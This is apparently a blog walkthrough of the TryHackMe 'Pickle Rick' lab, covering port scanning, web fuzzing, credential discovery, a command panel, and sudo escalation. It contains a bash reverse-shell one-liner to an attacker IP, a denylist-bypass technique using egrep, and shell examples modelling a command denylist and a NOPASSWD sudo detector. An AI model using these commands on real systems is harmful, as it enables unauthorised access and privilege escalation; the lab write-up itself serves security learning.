Write-up: Pickle Rick @ TryHackMe

Frank Leitner
Published in InfoSec Write-ups
5 min read, Aug 10, 2022

This write-up for the room Pickle Rick is part of my walk-through series for TryHackMe.

Room type: Free
Difficulty: Easy

Lab description

Basic enumeration

I start the lab with an nmap scan to find open ports on the machine.

nmap -nv -Pn -sC -sV -O -T4 -oA nmap 10.10.13.30

The options I use are the following:

  • -n
    No DNS resolution
    Resolving names makes no sense in the lab and only slows the scan down
  • -v
    Verbose
    Print open ports as soon as they are found
  • -Pn
    No ping scan
    In the lab, I assume the target is online, so I skip host discovery
  • -sC
    Use the default set of scripts
    Note: This includes some intrusive scripts; on a CTF box this is fine, in a real-world engagement --script=safe is preferred
  • -sV
    Version detection
    Attempt to enumerate the versions of the services found
  • -O
    OS detection
  • -T4
    Use aggressive timing
    Another option that is fine in CTF environments but can cause issues (dropped probes, unstable services) in the real world
  • -oA
    Output in all formats
    I’d like to have all formats stored: nmap, XML and grepable

Without any argument specifying the ports, nmap scans the 1000 most common TCP ports. The ranking it uses comes from the file /usr/share/nmap/nmap-services if you want to find out more.

The results come back showing just two ports open:

Nmap results for the top 1000 TCP ports
  • SSH on port 22. Often not worth looking at too deeply as long as there are other avenues.
  • A web server on port 80. Web servers and the applications they run usually go straight to the top of the priority list.

While the OS detection came back inconclusive, both the SSH and web server banners hint towards Ubuntu, likely Xenial (16.04) based on the 4ubuntu2.6 package version.

Checking the web application

The first step is to check what web application runs on the server, so I open a browser and have a look:

Main web page

It appears to be a fairly static page without any further links or functionality.

However, looking at the HTML reveals a piece of interesting information: a username

Username disclosed in an HTML comment

Finding more web content

To check whether there are any other common files, I perform a quick fuzz with ffuf:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://10.10.13.30/FUZZ
A quick check with ffuf shows two interesting files

This scan shows the existence of two interesting files:

  • a robots.txt
  • a login.php

The check for robots.txt should be one of the first steps anyway, as it might contain useful information such as paths the owner does not want crawled. In this case, though, it is not a standard robots file at all: it just contains an interesting word that does not exist in any language I know:

Content of the robots.txt file

It could be the password for the username, so I quickly attempt to log in with SSH. Unfortunately, the SSH server does not offer password authentication.

So I move to the second page found, the login.php, and do the same thing there:

Login successful

Exploring the web application

The login is successful and I start looking through the application. All links in the top menu lead to a denied page, but the commands page looks interesting.

The command that I can execute there might be an application-specific one, or it might be a shell command. I give it a quick try by typing id and having it executed:

A web shell provided by the application owner

Checking the file system

As it turns out, it is a web shell that is provided by the application owner for my convenience.

I now check my environment in which I can execute commands:

Content of directory

Trying to use cut or head to read files is prohibited, but the filter appears to work on command names and egrep is not on its list, so I use it to match any character, which prints the whole file:

The first flag

An alternative would be to simply use the browser itself to open the file. There is also a clue for the second flag:

So I do as I’m asked. In the home directory of rick I find the second ingredient that was asked for:

The second flag
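The panel's filter rejected cut and head but let egrep through, which is the usual weakness of a denylist on command names: it blocks the readers the author thought of and none of the others. As an added example that is not part of the write-up (the room's PHP is not shown on the page), here is a stand-in shell version of such a filter together with the egrep bypass used above. The denylist contents, the path-stripping, and the sample file are constructed assumptions, not the box's actual code.

```shell
#!/bin/sh
# Added example, not code from the write-up or from the room. The panel's
# real filter is not shown on the page; this stand-in reproduces what the
# write-up observed (cut and head rejected, egrep accepted) with a
# hypothetical denylist on the command name.

# Hypothetical denylist: the two commands the write-up saw blocked plus a
# few obvious file readers (assumption, not the box's actual list).
BLOCKED_CMDS="cat head tail cut more less"

# filter_cmd CMDLINE -> prints "denied" or "allowed" (always exits 0)
filter_cmd() {
    first=${1%% *}              # first word of the submitted command line
    first=${first##*/}          # ignore a leading path: /bin/cat -> cat
    for b in $BLOCKED_CMDS; do
        if [ "$first" = "$b" ]; then
            echo denied
            return 0
        fi
    done
    echo allowed
}

# run_if_allowed CMDLINE -> executes the command only when the filter passes
run_if_allowed() {
    if [ "$(filter_cmd "$1")" = allowed ]; then
        sh -c "$1"
    else
        echo "Command disabled" >&2
        return 1
    fi
}

# Constructed stand-in for the flag file; content is made up for the demo.
sample_file() {
    f=$(mktemp)
    printf 'flag{constructed-sample}\n' > "$f"
    echo "$f"
}

# demo: the listed readers are refused, "egrep ." prints every non-empty line
demo() {
    f=$(sample_file)
    for c in "head -n1 $f" "cut -c1- $f" "/bin/cat $f" "egrep . $f"; do
        printf '%-28s %s\n' "$c" "$(filter_cmd "$c")"
    done
    run_if_allowed "egrep . $f"
    rm -f "$f"
}
```

Run demo to see the four verdicts and the file contents printed through egrep. Any other reader (grep -r, tac, sed p, xxd, a shell builtin such as while read) gets past the same list, which is why a command panel like this cannot be made safe by extending the denylist.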

Getting a proper shell

Using the web shell is tedious, and even though it is not required to solve this room, I want to obtain proper shell access. On my local machine, I start an ncat listener with ncat -nvlp 8888 and execute a reverse shell from the command panel:

bash -c "bash -i >& /dev/tcp/10.14.5.57/8888 0>&1"

Unfortunately, upgrading to a proper TTY with python does not work, as python is not installed on the target. Still, this reverse shell is much more convenient than the web shell.

Local enumeration

For local enumeration, I use linpeas. I download it to the target and run it.

A few seconds later, a nice finding is displayed:

Vulnerable configuration found with linpeas

The same information can be obtained manually with sudo -l:

The same found manually

The low-privilege account www-data is allowed to run any command as root without having to provide a password.

This is a serious misconfiguration and a direct path to eternal damnation.
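To turn this finding into a repeatable check, here is an added shell example that is not part of the write-up or of linpeas: it flags a (ALL) NOPASSWD: ALL grant in sudo -l output and in sudoers entries, and shows the weak rule next to a corrected one. The sample sudo -l text, the placeholder hostname target, and the corrected rule are constructed assumptions, not copies of the screenshots.

```shell
#!/bin/sh
# Added example, not part of the write-up or of linpeas. Detection logic for
# the finding the write-up made with "sudo -l": a low-privilege user may run
# ALL as root with NOPASSWD. All sample text below is constructed for the
# demo (not copied from the screenshots); "target" is a placeholder host.

# Constructed "sudo -l" output as the web user would see it on such a box.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on target:
    env_reset, mail_badpass

User www-data may run the following commands on target:
    (ALL) NOPASSWD: ALL'

# The sudoers entry that produces the output above, next to a hypothetical
# corrected one: a single named binary, no NOPASSWD (or remove the rule).
WEAK_SUDOERS='www-data ALL=(ALL) NOPASSWD: ALL'
FIXED_SUDOERS='www-data ALL=(root) /usr/sbin/service apache2 reload'

# ERE fragments shared by both checks
RUNAS_ROOT='\((ALL|root)([[:space:]]*:[[:space:]]*ALL)?\)'
NOPASSWD_ALL='NOPASSWD:[[:space:]]*ALL([[:space:]]|$)'

# check_sudo_l TEXT -> CRITICAL (any command as root, no password),
#                      WARN (some passwordless commands), or OK
check_sudo_l() {
    if printf '%s\n' "$1" | grep -Eq "^[[:space:]]*$RUNAS_ROOT[[:space:]]*$NOPASSWD_ALL"; then
        echo CRITICAL
    elif printf '%s\n' "$1" | grep -q 'NOPASSWD:'; then
        echo WARN
    else
        echo OK
    fi
}

# check_sudoers_line LINE -> same verdicts for one /etc/sudoers rule;
# root's own rule, comments and blank lines are expected and pass as OK
check_sudoers_line() {
    case "$1" in
        '#'*|'') echo OK; return 0 ;;
    esac
    user=${1%%[[:space:]]*}
    if [ "$user" != root ] && printf '%s\n' "$1" | grep -Eq "=$RUNAS_ROOT[[:space:]]*$NOPASSWD_ALL"; then
        echo CRITICAL
    elif printf '%s\n' "$1" | grep -q 'NOPASSWD:'; then
        echo WARN
    else
        echo OK
    fi
}

# demo: evaluate the constructed sudo -l output and both sudoers entries
demo() {
    echo "sudo -l output : $(check_sudo_l "$SAMPLE_SUDO_L")"
    echo "weak sudoers   : $(check_sudoers_line "$WEAK_SUDOERS")"
    echo "fixed sudoers  : $(check_sudoers_line "$FIXED_SUDOERS")"
}
```

WARN is deliberately separate from CRITICAL: a passwordless grant for one binary is not automatically a root shell, but each listed binary still needs a look, since many of them (editors, pagers, find, interpreters) can spawn a shell. Edits to sudoers belong in visudo, which checks the syntax before saving; visudo -c checks an existing file.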

Escalating my privileges

The only thing that is left is to execute a few commands as root:

The last flag

I enter the final flag and the room is completed.

Originally published at https://github.com.



Tech nerd, doing security stuff for fun and some as a job | CISSP-ISSAP, OSCP